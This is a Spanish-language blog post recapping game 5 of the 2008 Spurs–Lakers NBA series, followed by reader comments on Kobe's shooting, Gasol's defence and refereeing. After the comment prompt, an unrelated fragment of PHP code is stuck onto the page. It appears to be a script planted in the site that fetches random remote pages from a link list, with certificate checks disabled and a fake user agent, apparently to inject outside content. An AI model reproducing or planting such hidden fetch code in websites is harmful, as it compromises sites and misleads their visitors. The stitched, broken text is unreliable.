Año par (5º partido: Spurs 92 – Lakers 100)

30 de May de 2008 por TheDeerHunter

Finalmente han caído los campeones. Con muchísimas más dificultades de lo que indica el marcador global de la serie, Los Angeles vuelven a su hábitat natural, las finales de la NBA donde esperan contrincante.

Spurs ha terminado por padecer el desgaste lógico de su parte del cuadro pero han mostrado grandeza hasta el último instante (literalmente) cuando sabían que lo tenían todo perdido y buscaron constantemente la canasta con las escasas fuerzas que les quedaban.

Duncan destrozando la defensa Laker durante la primera parteEl partido fue vibrante, espectacular. Con todos los ingredientes para disfrutar del máximo espectáculo que este deporte puede ofrecer. Por si esto fuera poco, en un hecho sin precedentes, la NBA decidió añadir unas gotas más de salsa al tema, tomando parte en la polémica que rodeó el final del 4º partido en San Antonio… eso sí, teniendo especial cuidado en sólo hablar de la última jugada e ignorando muchas otras, dejando a su suerte así, en el disparadero, a colegiados del anterior y del presente partido. Poco importaba influir en la neutralidad de este partido decisivo porque, lo fundamental, las audiencias lo habrán agradecido adecuadamente.

En esta tesitura los Spurs pusieron la velocidad “Superdestructor Imperial” desde el primer cuarto y le dieron un baño en toda regla al equipo local, que sin saber muy bien cómo (bueno sí, teniendo a uno que luce el 24) se mantuvo a duras penas en la pomada, que no en el juego.

En esa fase del partido, San Antonio mostró su cara invencible. La cara del campeón, con un Duncan destripando la débil defensa de L.A y moviendo el balón sensacionalmente. Mención especial merecen Finley, Barry y los habituales que cosían a triples todo lo que “el capo” de las Islas Virgenes decidía que tiraran.

Los Lakers, literalmente sobrepasados por las circunstancias. Nerviosos y mal preparados para este partido no sabían cómo achicar todo lo que les estaba cayendo encima. En el peor momento, con 17 puntos abajo terminando el segundo cuarto, Phil Jackson rizó todavía más el rizo en el caos de partido que estaban haciendo, sacando juntos de forma inédita en todos los playoffs a la serie B de su plantilla: Farmar, Vujacic, Radmanovic, Walton y Turiaf… sin ninguno miembro del tridente angelino en pista. Curiosamente con el pitote que formaron estos cinco, San Antonio perdió el orden que había llevado todo el partido, vió la posibilidad de matarlo y se aceleró, descontrolándose por completo. Sin saber cómo se encontraron de repente que habían perdido casi toda la ventaja… en ese momento, apenas tras el descanso, ellos no lo sabían pero su derrota era sólo cuestión de tiempo. Habían desaprovechado, otra vez más, una gran ocasión.Kobe remonta la linea de fondo y asiste a Gasol para una canasta comoda

En la segunda parte todo cambió radicalmente. Los rostros de todos los miembros del equipo local pasaron súbitamente del nervio y desconcierto a la concentración más absoluta. Se encontraron con que tenían la posibilidad de hacerlo y todos entraron en una especie de trance. Kobe definitivo. Gasol haciendo una defensa de libro a Duncan. Todos centrados como posesos en hacer cada uno su papel. Inmenso.

Spurs bastante hizo con aguantar el chaparrón en ese momento… porque en lo que minutos antes salía todo a todos, ahora no eran tantos los que lo intentaban y algunos menos los que lo lograban. A pesar de todo su casta de campeón los mantenía vivos.

Pero todavía quedaba tela que cortar. La última partida de “brisca” entre los dos viejos zorros. Popovic deshace su juego interior que tantos frutos le había dado hasta ese momento y mete a 4 bajos junto a Duncan. San Antonio vuelve a tomar la iniciativa, pero Ginobili falla sólo un triple decisivo. El rendimiento del argentino ha sido decisivo en esta eliminatoria, lamentablemente para Spurs.

Acto seguido Phil Jackson se la juega y saca a Odom del partido por Radmanovic, reflejando a su rival con Gasol y 4 exteriores. Ajusta su defensa y pone el partido en manos de Kobe y de Gasol. Ambos impecables en el “momento de los campeones”. Ahí se acabó todo.

Lakers confirman su candidatura al anillo eliminando con cierta suficiencia al teórico equipo más difícil… además con un subidón moral imponderable asociado lógicamente a la proeza que han logrado.

Kobe y Gasol celebran la victoria al final del partido

Ahora a esperar rival y si es posible que se maten a partidos, que ninguno es moco de pavo y hay desventaja de campo. Supongo que esta noche, el “EuroLakers” arribará a algun bar para disfrutar juntos desde la “barra” de una batalla que ellos ya han librado.

Comenta

10 comentarios a esta entrada

  1. telekoman dice:
    #1

    Dios,que tarde acaban los puñeteros partidos. Quedarse a verlo cuando te tienes que levantar a las 8 es todo un suplicio. Eso sí, el partido enganchaba que no veas.

    Oye, pregunta capciosa para todos aquellos que han visto jugar y tirar de 3 más a kobe que yo. ¿No tira muy plano? Que las mete, evidentemente, pero es que el balón sale de su mano que casi ni se ve siguiendo una línea recta casi. En comparación, los 2 triples consecutivos que metió Finley al principio eran de lo más estéticos.

    El que parece que no va a meter un triple en su vida es Fisher. Que estilo más horroroso. Luego le entran, pero le ves tirar y piensas: Ese no llega al aro ni de coña.

      Citar

  2. telekoman dice:
    #2

    Por cierto, lo de los árbitros ayer un poco escandaloso. no pitaban nada de nada a favor amarillo, y Kobe y Gasol se llevaron unas cuantas.

      Citar

  3. TheDeerHunter dice:
    #3

    Pues Kobe en estas dos últimas series, no sé porqué será, pero está tirando bastante regulerillo desde la línea de 3. No sé si será por la tensión, el desgaste, los problemas físicos…

    Lo que no he podido detectar es si ha habido algún mínimo cambio en la mecánica que tenga que ver con tu comentario.

    Las bombacas de Fisher las querría para sí Navarro.

      Citar

  4. MagicJohnson32 dice:
    #4

    ¿¿¿Cómo??? ¿¿Que el arbitraje no fue favorable a los Lakers?? ¿¿Qué está pasando?? Y sobre todo… ¿¿qué opina Vicente Salaner al respecto??

    Hubo un tiempo en el que Stern se hacía respetar. Lo mismo pasa con Salaner. Qué pena.

    Sobre los triples de Kobe… En general sus tiros no tienen arco. La mecánica es increíble, absolutamente perfecta, pero el lanzamiento es bastante plano, aunque tampoco me parece un caso muy exagerado.

      Citar

  5. Gallis dice:
    #5

    Que maravilla, dios mio de mi vida…que año nos está regalando esta gente…

    Remontar 2 veces a un equipo como los Spurs me parece sencillamente asombroso. Parece que anoche en el descanso se miraron el espejo, vieron el miedo a ganar en sus ojos y se negaron a caer en tamañno error. Farmar, Vujacic y Walton aportaron en el momento justo, Odom, sin hacer un gran partido, hizo uno de los mejores partidos que le recuerdo, porque por primera vez le ví hacer lo que siempre he esperado de él: los pocos momentos que Kobe se echaba a un lado, él hizo de Kobe…ENORME. Y la defensa de Gasol de la segunda parte es memorable…

    Y lo de Kobe, pues en fin, que bonito es el baloncesto cuando juegan tipos como éste…

    La única palabra con la que soy capaz de resumir lo de anoche es: GRACIAS!!!

    Y sobre el tema de los arbitros yo creo que en Playoff siempre son iguales. Al principio de la serie son caseros, pero en cuanto llegan los partidos en los que hay algo en juego son arbitrajes de Playoffs, de esos que hacen que, generalmente, acabe ganando el mejor, juegue en casa o no. Es cierto que anoche no le pitaron una a los Spurs, pero creo que si los Lakers hubieran dado más, tampoco las habrían pitado…

    En realidad creo que la coña de los arbitros deberíamos dejarla ya, porque una final no lo merece, pero supongo que cuando vuelva a haber una decisión a favor de los Lakers, aunque este precedida de 4 decisiones en contra, volveremos al turrón, que diría Txus, jeje…

      Citar

  6. Viva_Dirk dice:
    #6

    Vaya partidazo si señor. La confianza que debe dar remontarle 20 y 17 puntos a San Antonio en varios partidos de final de conferencia es tremenda, ojalá eso se note en la final.

    Peazo defensa de Gasol sobre Duncan en la 2ª parte, coincido con Gallis. Ah! y por si se nos olvidaba, que buenísimo es el tio Phil….

    De los tiros de Kobe, decir que desde que tiene la lesión tira mas plano cuanto mas alejado tira, y por tanto peor, pero la madurez que está mostrando en ese aspecto confirma muchas cosas.

      Citar

  7. gasoleo dice:
    #7

    Realmente todo un partidazo. Creo que pocos entrenadores en el mundo hubieran realizado la magistral jugada Radmanovic por Odom, una extraordinaria jugada de ajedrez.

    El factor físico también ha sido decisivo en esta serie, los Spurs han acabado desinflándose. Sobre todo Duncam que no ha podido mantener el ritmo en los momentos decisivos. Gasol le ha sometido a un duro trotar sobre la pista, sobre todo en las transiciones. La rapidez de Gasol en las transiciones han dado claras ventajas a los Lakers, tanto en defensa como en ataque.

    Y estoy totalmente de acuerdo con el post anterior. Se está creando una nueva saga, este equipo junto con Bynum puede ser el dominador de los próximos años, una mezcla entre los Bulls de Jordan y los Lakers de Magic.

    Ahora a esperar la Final, es fácil apostar por los Celtics. Detroit da la sensación de estar demasiado limitado físicamente.

    Saludos.

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    Grande Gallis, con sus advertencias preventivas.. y van… pero perdone usted,, Consigliero arbitrale ; )

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    Y Kobe no tirá un poco arriba para la mecánica sea perfecta?. Ehh,, hablo de mecánica, no de acierto,,que eso si que es incuestionable.

      Citar

  10. Gallis dice:
    #10

    Nada, nada, Aro, no tengo nada que perdonar. Tú a lo tuyo…

    Y recuerda hablar de los arbitros solo en los partidos que gane Stern, digoooooo, los Lakers…si es que ganan alguno, claro, que nunca se sabe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>